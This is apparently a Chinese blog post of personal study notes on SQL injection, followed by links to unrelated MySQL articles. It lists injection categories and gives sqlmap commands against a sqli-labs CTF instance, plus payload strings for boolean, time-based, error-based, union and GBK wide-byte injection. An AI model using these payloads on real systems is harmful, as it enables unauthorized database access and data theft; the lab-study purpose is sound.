SQL注入学习(学无止境越学越不会)

2023-10-09 13:20

本文主要是介绍SQL注入学习(学无止境越学越不会),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

上学期间的

sql注入一直都是个垃圾甚至不会写。

sql注入基础原理
首先呢了解一下什么是sql注入

sql注入就是直接将URL中的参数,http body中的post参数或者其他外来用户输入与sql语句进行拼接造成待执行的sql语句可控。最后欺骗服务器的恶意命令。

最近学习感觉SQL注入不止这么点就又来更新了:

类型:
按照注入点的类型分类的话:
(1)数字型注入:例如?id=1
(2)字符型注入:例如?name=admin
(3)搜索型注入:例如?keyword=一些你猜测的关键字

按照提交方式的话:
(1)get注入:注入点在get参数部分例如?id=1,注入点就是id
(2)post注入:在表单中注入点在post位置
(3)cookie注入:cookie值
(4)http头部注入:头部字段中

执行效果:
(1)布尔盲注:即可以根据返回页面判断条件真假的注入
(2)时间盲注:即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。
(3)报错注入:即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。

单引号
双引号
基于数字型注入

(4)联合查询注入:可以使用union的情况下的注入。
(5)堆查询注入:可以同时执行多条语句的执行时的注入。
(6)宽字节注入:单字节、多字节、利用gbk

下面用sqlmap跑出答案根据sqlilab:(不会有人觉得自己比sqlmap厉害吧)
首先呢来个简单的最简单的操作
可以看到?id=1显示正常 ?id=1’显示不正常所以存在注入点
在这里插入图片描述
在这里插入图片描述
直接上手sqlmap跑库名

sqlmap -u http://1fdaef43-dde6-4499-84f2-1afd3e9bb1b4.node3.buuoj.cn/Less-1/?id=1 --dbs 

在这里插入图片描述知道库我们就可以跑表名

sqlmap -u http://1fdaef43-dde6-4499-84f2-1afd3e9bb1b4.node3.buuoj.cn/Less-1/?id=1 -D'ctftraining' -tables v3 

在这里插入图片描述
接着跑列名

sqlmap -u http://1fdaef43-dde6-4499-84f2-1afd3e9bb1b4.node3.buuoj.cn/Less-1/?id=1 -D'ctftraining' -T'tables' -columns v3

在这里插入图片描述现在我们只需要查询这个flag的内容就可以了

sqlmap -u http://1fdaef43-dde6-4499-84f2-1afd3e9bb1b4.node3.buuoj.cn/Less-1/?id=1 -D'ctftraining' -T'flag' -C'flag' -dump v3

在这里插入图片描述
-D 就是database数据库
-T 就是tables表名
-C 就是columns列名
dump就是跑出内容

布尔注入

布尔型

?id=1'and (length(database()))>10 --+

当database的长度大于10的时候返回值位true,反之为false

报错型
构造payload让信息通过错误提示回显出来,一种类型是先报字段数,再利用后台数据库报错机制回显(跟一般的报错区别是,一般的报错注入是爆出字段数后,在此基础通过正确的查询语句,使结果回显到页面;后者是在爆出字段数的基础上使用能触发SQL报错机制的注入语句)

Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a;

count计数 concat连接字符 floor重复数据 group by 进行分组rand(0)避免数据重复造成的错误。

时间型:
通过sleep函数还有if sleep联合逐个猜

?id=1' and (if(ascii(substr(database(),1,1))>100,sleep(10),sleep(4))  --+ 

第一个ascii码大于100,true沉睡10s false沉睡4s。

时间盲注

和上面的一样使用sleep和if sleep联合一起猜,
通过回显的时间进行判断。

报错注入

在无法使用联合查询的时候用,前提不能被过滤掉一些关键函数。
利用数据库的某些机制人为制造错误。
(1)xpath语法错误:
利用extractvalue和updatexml函数

函数原型:extractvalue(xml_document,Xpath_string)
正常语法:extractvalue(xml_document,Xpath_string);
第一个参数:xml_document是string格式,为xml文档对象的名称 第二个参数:Xpath_string是xpath格式的字符串
作用:从目标xml中返回包含所查询值的字符串

payload     -- --    id='and(select extractvalue("anything",concat('~',(select语句))))
查数据库名:id='and(select extractvalue(1,concat(0x7e,(select database()))))
爆表名:id='and(select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))))
爆字段名:id='and(select extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="TABLE_NAME"))))
爆数据:id='and(select extractvalue(1,concat(0x7e,(select group_concat(COIUMN_NAME) from TABLE_NAME))))

联合查询注入

首先要求网站需要有一个正常的回显位置,简单来说就是注入后数据库会在页面出现一个正常的回显。

如何判断是否存在:
1.判断是否存在注入点
2.判断是整型还是字符型
3.判断查询列数
4.判断显示位
5.获取所有数据库名
6.获取数据库所有表名
7.获取字段名
8.获取字段中的数据

之后就是加入一些联合查询的语句
例如:?id=-1' union select 1,2,( select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA)
剩下的都是一些正常注入语句

宽字节注入

首先就是
1、单字节字符集:所有的字符都使用一个字节来表示,比如 ASCII 编码(0-127)。

2、多字节字符集:在多字节字符集中,一部分字节用多个字节来表示,另一部分(可能没有)用单个字节来表示。

3、宽字节注入时利用mysql的一个特性,使用GBK编码的时候,会认为两个字符是一个汉字。

利用反斜杠的GBK编码为%5C,只要转换这些就可以了
例如查询数据库版本,将反斜杠通过GBK编码就可以,其他的一样编码

192.168.0.104/aiyou/1.php?id=-2%E0' union select 1,database(),version(),4 --+

在这里插入图片描述
那么如何发现呢首先就是

MySQL的在使用GBK编码的时候,会认为两个字符是一个汉字
前一个ASCII码要大于128,才到汉字的范围)

在注入点输入(‘)会被转义为(’)编码后变成(%5c%27),所以只有吧\去掉才能注入
然而GBK编码表,就会把\吃掉。

简单使用and、or、’,判断是否有注入,不行接着加入一些自己创的语句简单判断
如果没有看到效果,可进行宽字节注入探测,输入%bf’(或者%81’),发现报错,存在宽字节注入
都不行那就试试https头部注入

这玩意咋越看越不会,就先这样,写别的去了

mysql注入

最近上班看了继续看注入了
sql注入大致分为有回显的和无回显的。

判断是否存在sql注入

判断是否注入就是看是否出现异常

比如加单引号、双引号、括号或者都混合起来
又或者当没有返回报错信息的时候,用上前面的那种?id=1 and 1=1 还有and1=2这是数字型的,如果遇到字符型的话需要我们闭合语句,使用#|--+|'等闭合
但是当网页啥都没有返回的时候,需要我们加入例如sleep()这类能够产生延迟的函数,对比服务器响应的时间来判断。
sql常用语句

有回显的

SELECT 列名称 FROM 表名称 WHERE 列 运算符 值

获取列的数量

?id=1' order by number--+
?id=1' union select 1,2,3,4--+

就是如果超过了就会报错,他只会显示有的
首先information_schema.schemata

information_schema.schemata介绍
+1

依靠慢慢从上到下查库出来

报错注入

上面哪里就只有一些
就是当你注入最后他还是会给你爆出错误例如mysql_error()等,并不会和无回显的一样啥都没
报错常用的

1.floor() 
select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);2.extractvalue() 
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));3.updatexml()
select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));4.geometrycollection()
select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));5.multipoint()
select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));6.polygon() 
select * from test where id=1 and polygon((select * from(select * from(select user())a)b));7.multipolygon() 
select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));8.linestring() 
select * from test where id=1 and linestring((select * from(select * from(select user())a)b));9.multilinestring() 
select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));10.exp() 
select * from test where id=1 and exp(~(select * from(select user())a));

无回显的

需要判断

回显内容、长度不同
返回的HTTP头的不同,比如结果为真可能会返回Location头或者set-cookie
看HTTP状态码,比如结果为真(登录成功)则3xx重定向,为假则返回200
服务器响应时间

盲注

判断表达式的真假(or and ^等逻辑运算符)
字符串截取(substr()、left()、REGEXP)
判断字符串是否相等(= > LIKE REGEXP等比较运算符)

例如布尔盲注

这篇关于SQL注入学习(学无止境越学越不会)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/173101

相关文章

Mysql数据库聚簇索引与非聚簇索引举例详解

《Mysql数据库聚簇索引与非聚簇索引举例详解》在MySQL中聚簇索引和非聚簇索引是两种常见的索引结构,它们的主要区别在于数据的存储方式和索引的组织方式,:本文主要介绍Mysql数据库聚簇索引与非... 目录前言一、核心概念与本质区别二、聚簇索引(Clustered Index)1. 实现原理(以 Inno

sqlserver、mysql、oracle、pgsql、sqlite五大关系数据库的对象名称和转义字符

《sqlserver、mysql、oracle、pgsql、sqlite五大关系数据库的对象名称和转义字符》:本文主要介绍sqlserver、mysql、oracle、pgsql、sqlite五大... 目录一、转义符1.1 oracle1.2 sqlserver1.3 PostgreSQL1.4 SQLi

MySQL数据库双机热备的配置方法详解

《MySQL数据库双机热备的配置方法详解》在企业级应用中,数据库的高可用性和数据的安全性是至关重要的,MySQL作为最流行的开源关系型数据库管理系统之一,提供了多种方式来实现高可用性,其中双机热备(M... 目录1. 环境准备1.1 安装mysql1.2 配置MySQL1.2.1 主服务器配置1.2.2 从

深入理解Mysql OnlineDDL的算法

《深入理解MysqlOnlineDDL的算法》本文主要介绍了讲解MysqlOnlineDDL的算法,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小... 目录一、Online DDL 是什么?二、Online DDL 的三种主要算法2.1COPY(复制法)

mysql8.0.43使用InnoDB Cluster配置主从复制

《mysql8.0.43使用InnoDBCluster配置主从复制》本文主要介绍了mysql8.0.43使用InnoDBCluster配置主从复制,文中通过示例代码介绍的非常详细,对大家的学习或者... 目录1、配置Hosts解析(所有服务器都要执行)2、安装mysql shell(所有服务器都要执行)3、

k8s中实现mysql主备过程详解

《k8s中实现mysql主备过程详解》文章讲解了在K8s中使用StatefulSet部署MySQL主备架构,包含NFS安装、storageClass配置、MySQL部署及同步检查步骤,确保主备数据一致... 目录一、k8s中实现mysql主备1.1 环境信息1.2 部署nfs-provisioner1.2.

MySQL中VARCHAR和TEXT的区别小结

《MySQL中VARCHAR和TEXT的区别小结》MySQL中VARCHAR和TEXT用于存储字符串,VARCHAR可变长度存储在行内,适合短文本;TEXT存储在溢出页,适合大文本,下面就来具体的了解... 目录一、VARCHAR 和 TEXT 基本介绍1. VARCHAR2. TEXT二、VARCHAR

MySQL中C接口的实现

《MySQL中C接口的实现》本节内容介绍使用C/C++访问数据库,包括对数据库的增删查改操作,主要是学习一些接口的调用,具有一定的参考价值,感兴趣的可以了解一下... 目录准备mysql库使用mysql库编译文件官方API文档对象的创建和关闭链接数据库下达sql指令select语句前言:本节内容介绍使用C/

mybatis直接执行完整sql及踩坑解决

《mybatis直接执行完整sql及踩坑解决》MyBatis可通过select标签执行动态SQL,DQL用ListLinkedHashMap接收结果,DML用int处理,注意防御SQL注入,优先使用#... 目录myBATiFBNZQs直接执行完整sql及踩坑select语句采用count、insert、u

MySQL之搜索引擎使用解读

《MySQL之搜索引擎使用解读》MySQL存储引擎是数据存储和管理的核心组件,不同引擎(如InnoDB、MyISAM)采用不同机制,InnoDB支持事务与行锁,适合高并发场景;MyISAM不支持事务,... 目录mysql的存储引擎是什么MySQL存储引擎的功能MySQL的存储引擎的分类查看存储引擎1.命令